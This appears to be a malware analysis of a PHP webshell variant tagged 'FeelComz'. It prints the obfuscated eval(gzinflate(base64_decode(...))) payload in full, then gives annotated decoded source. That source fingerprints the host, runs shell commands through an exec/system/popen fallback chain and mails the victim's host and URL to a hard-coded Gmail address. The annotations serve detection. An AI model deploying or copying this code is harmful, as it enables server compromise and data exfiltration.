This is a new variant of the FeelComz attack, which tries to hide its code from novice victims. The code is first
encoded with the PHP function base64_encode and then compressed with the PHP function gzdeflate.
##[ Fx29ID ]##
// Banner line: prints "ID: FeeLCoMz". The tag is split into two literals, presumably to dodge naive string matching.
fx("ID","FeeL"."CoMz");
function fx($t,$c) {
// Prints one "label: value" line; array values are joined with single spaces.
$value = is_array($c) ? implode(" ", $c) : $c;
echo "$t: " . $value . "\n";
}
// Obfuscation layer: the string literal is base64-decoded, then gzinflate'd, and the result is passed to eval().
// That decode order means the payload was gzdeflate'd first and base64-encoded second. The decoded code is
// reproduced further down the page under "decoded version".
// Detection note: eval(gzinflate(base64_decode(...))) is a classic webshell/dropper construct and a cheap triage grep.
eval(gzinflate(base64_decode('
rVZRc9oxEH7vTP/DongS06GEcLmmoSWQFnNk2gTO
4LYzhPEYx4BbI3sku4Fm+t+7krAxN22e7sVG3+5+
++1qLdG5extJVsnzZ8YIANrQXdLUfwjM6huEbkY5
RNl3k4wt+5xlu9e9nk2U3bnpoX2xaV7SDfVNEgYK
X2zQ97pvkVpXxAu6jgNqVjtkeEdaZNjvFz7DMXqM
BiN3OM4h5+76VsahJDdj3hoDC0aVndRMlFXt4KNF
XhZUzliapFLxzzinLHUzQfk+GqXKUHxhLD5bJAuD
NqnLkPUWf5vVOoFlCVtKLA/v3SC9McqXI8u+Rbpu
KNwHHqbePKImWrHI6ecZVjm1Z4W0QQ8zE0fQoAWk
vgoCk6A07BTm63NKC3SBC4VO4tSLCjiVK1JSMu47
d+91sUEoFhnztc6joyn0vzQvxwPri/UeZkdHuEUP
dI5bZLi6e1MymxxG7mA4npCZ3MGQfT0w29a/jjWe
uI59ox3mcbBFD+LYH0GSqYh75si9AUNsRUrXBB3X
XhiZxA/Teca6S7xq+/EaC195IoxA+B6DVZomrdPT
nIbUgCh+3SqsIw1jBvuRgUfgNM04A+w0C10s2CTS
7Eo7qcLQBsrpMjRxzLAhv/OpQhU6MLEdC1rQv/44
tt7Az1K2chMxn8HpDyyXbpJISkD9JVp0lDvt5sFC
7kohsULXSbo1JQMOxny1PM69LX5KBxkpkySBaUik
XGPu4dJNKFKROxwfAx6Z70WRHrMCrYTM1RkUVjuY
h6erLj5Zw18HqOH5s3ABZq6MSJNs3SMUTjUjxjp2
7fkah8wk9/weu65w5KxRoAckYkWjyN1T7WL3sE7+
h2A9WCqwG89dkXo8lZ3sakseuyOVLurbjxkeVdg7
6YkYZYHrR9Rj5h/yJJ4x6Ypnv8mUm/63VHFCGcn3
k1MRZ9zH/VwhqbKpRPUTaF4dn53U4ISfqOl9hIdV
GFEwobKg8QIDNKr01PH4xdTDaVrVoNm4fIXJ4Sck
fhQLyb3Xst8BYnEe8wpRpt3wSRN+hOUZ+S7CH0gh
n8WEVFA5y9aUh/7OUhrg/xzpfDoElB9cteGscfHX
xfnZ6+a51q/wNvA4Y4FmO927vDhrNKq4bgAeiP+8
Iwc9LXOev/774tUThMp+wHb7BNuT2v6j6kOJpxSj
33Ug8O6wxRLXPS63WZ7xRrpNdJPxFi7fwWBM5Bo/
62+uugdckXi+umvQ1i9s8uo4MDlSyARe4i95imMS
ZUVUnxi7WwXaVxk+T6x4HKsrCEpoX6Lquiqjjrpv
8rpy8qkqY6ZL7OD/il8=
')));
// Ends the request once the payload has run, leaving the group's tag as the last output line.
die("FeeLCoMz");
Author's note: DO NOT DECODE such obfuscated strings on your own computer!
Instead, use an online service such as: http://www.tareeinternet.com/scripts/decrypt.php
The following is the decoded version of the string above:
// Host fingerprinting (decoded payload, part 1): gathers environment details and prints them through fx()
// as "label: value" lines. Nearly every call is @-suppressed so warnings never reach the response.
$P = @getcwd();
$IP = @getenv("SERVER_ADDR");
$UID = fx29exec("id");   // runs the shell command "id" through whichever exec primitive fx29exec() finds enabled
fx("SAFE",@safemode()?"ON":"OFF");
fx("OS",@PHP_OS);
fx("UNAME",@php_uname());
fx("SERVER",($IP)?$IP:"-");
fx("USER",@get_current_user());
fx("UID",($UID)?$UID:"uid=".@getmyuid()." gid=".@getmygid());   // falls back to PHP's own uid/gid only when the shell call returned an empty value ("Error!" is truthy and is printed as-is)
fx("DIR",$P);
fx("PERM",(@is_writable($P))?"[W]":"[R]");   // writability of the current directory; presumably the key datum for a follow-up upload
fx("HDD","Used: ".hdd("used")." Free: ".hdd("free")." Total: ".hdd("total"));
fx("DISFUNC",@getdisfunc());   // array of disabled functions; fx() joins it with spaces
##[ FX29SHEXEC ]##
// Exfiltration (decoded payload, part 2): e-mails the compromised host name and the request path
// (i.e. the URL through which the injection worked) to a hard-coded mailbox.
$web = $_SERVER["HTTP_HOST"];
$inj = $_SERVER["REQUEST_URI"];
$body = "URL $web$inj \nUname $system";   // $system is never assigned anywhere in this listing, so "Uname" is empty (undefined-variable notice)
mail("citbun@gmail.com","hasil scan http://$web$inj", "$body");   // detection: outbound mail sent by the web-server user with subject "hasil scan ..." ("scan result")
// Reports whether PHP safe_mode is enabled, treating any truthy ini value or a case-insensitive "on" as TRUE.
// Note: safe_mode was removed in PHP 5.4 and eregi() in PHP 7, so on current PHP the eregi() call (reached whenever
// ini_get() returns an empty value) raises an undefined-function Error; the script evidently targets old hosts.
function safemode() {
return (@ini_get("safe_mode") OR eregi("on",@ini_get("safe_mode")) ) ? TRUE : FALSE;
}
// Returns the disable_functions ini setting split on commas.
// explode() always yields at least one element (an empty string when nothing is disabled), so the
// !empty() guard never fires; entries are also not trimmed, so "exec, system" keeps a leading space on "system".
function getdisfunc() {
$rez = explode(",",@ini_get("disable_functions"));
return (!empty($rez))?$rez:array();
}
// TRUE when $func is defined, callable and not present in the (untrimmed, non-strict) disable_functions list.
function enabled($func) {
return (function_exists($func) && is_callable($func) && !in_array($func,getdisfunc())) ? TRUE : FALSE;
}
// Command-execution fallback chain: tries exec, shell_exec, system, passthru and finally popen, in that
// order, using the first primitive enabled() approves; returns the command output as a string, or the
// literal "Error!" when none is available.
// Detection note: this exact sequence — function_exists/is_callable probes followed by ob_start()-wrapped
// system()/passthru() calls — is a well-known webshell fingerprint.
function fx29exec($cmd) {
if (enabled("exec")) { exec($cmd,$o);
$rez = join("\r\n",$o);   // exec() returns output as one array element per line
} elseif (enabled("shell_exec")) {
$rez = shell_exec($cmd);
}elseif (enabled("system")) {
@ob_start();   // system() and passthru() write straight to the response, so output buffering is used to capture it
@system($cmd);
$rez = @ob_get_contents();
@ob_end_clean();
}elseif (enabled("passthru")) {
@ob_start();
passthru($cmd);
$rez = @ob_get_contents();
@ob_end_clean();
}elseif (enabled("popen") && is_resource($h = popen($cmd.' 2>&1', 'r')) ) {
// popen branch merges stderr into stdout; $rez is appended to here without ever being initialised
while ( !feof($h) ) {
$rez .= fread($h, 2096);
}
pclose($h);
}else {
$rez = "Error!";
}
return $rez;
}
function vsize($size) {
// Formats a byte count as a human-readable string ("1.5 KB", "3 MB", ...) rounded to two decimals.
// Returns FALSE when $size is not numeric.
if (!is_numeric($size)) {
return FALSE;
}
$units = array(1073741824 => " GB", 1048576 => " MB", 1024 => " KB");
foreach ($units as $divisor => $suffix) {
if ($size >= $divisor) {
return round($size/$divisor*100)/100 . $suffix;
}
}
return $size . " B";
}
// Disk-space summary for the current directory; $type is "total", "free" or "used".
// Bug in the original: $U is read before it is assigned, so "used" reports the total space rather than total minus free.
function hdd($type) {
$P = @getcwd();
$T = @disk_total_space($P);
$F = @disk_free_space($P);
$U = $T - $U;   // $U is null here; the intended expression was evidently $T - $F
$hddspace = array("total" => vsize($T), "free" => vsize($F), "used" => vsize($U));
return $hddspace[$type];   // an unknown $type yields null (with an undefined-index warning)
}
As you may notice, compared to earlier variants there is nothing new here apart from the base64 encoding and
compression of the code.